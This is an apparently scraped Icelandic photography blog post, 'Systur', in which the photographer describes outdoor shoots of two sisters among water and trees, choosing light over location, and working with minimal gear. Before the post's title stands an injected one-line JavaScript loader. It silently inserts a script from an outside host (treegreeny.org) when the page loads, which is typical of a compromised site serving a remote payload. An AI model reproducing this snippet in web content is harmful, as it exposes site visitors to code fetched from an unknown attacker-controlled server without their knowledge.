;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Systur – Eydís — Ljósmyndun

Systur

eogk-3 eogk-2 eogk-1

Við eigum dásamleg útivistarsvæði víða á höfuðborgarsvæðinu. Ég dregst ósjálfrátt að vatni og trjám, það er bara einhver blanda sem mér líður vel nálægt. Fyrir utan þá staðreynd að gott er að nýta skjól trjánna sem náttúrulegt skyggni fyrir sterkri sól eða rigningu. Í útimyndatökum eltist ég ekki bara við viðfangsefni mitt heldur líka bestu birtuna og hún verður alltaf ofan á ef ég þarf að velja um staðsetningu eða birtu. Til að vera sem hreyfanlegust þá takmarka ég þann búnað sem ég nota í útimyndatökum og þarf því að nýta mér það sem ég hef með að vinna hverju sinni. Hvort sem það er ljós veggur inni í bæ eða að velja staðinn rétt í skógarjaðrinum sem gefur mér næga og milda birtu.

eogk-5    eogk-6  eogk-8

 

En besta birtan í bænum jafnast ekkert á við að ná einlægu brosi.

 

eogk-7

 

Leave a Reply

Your email address will not be published. Required fields are marked *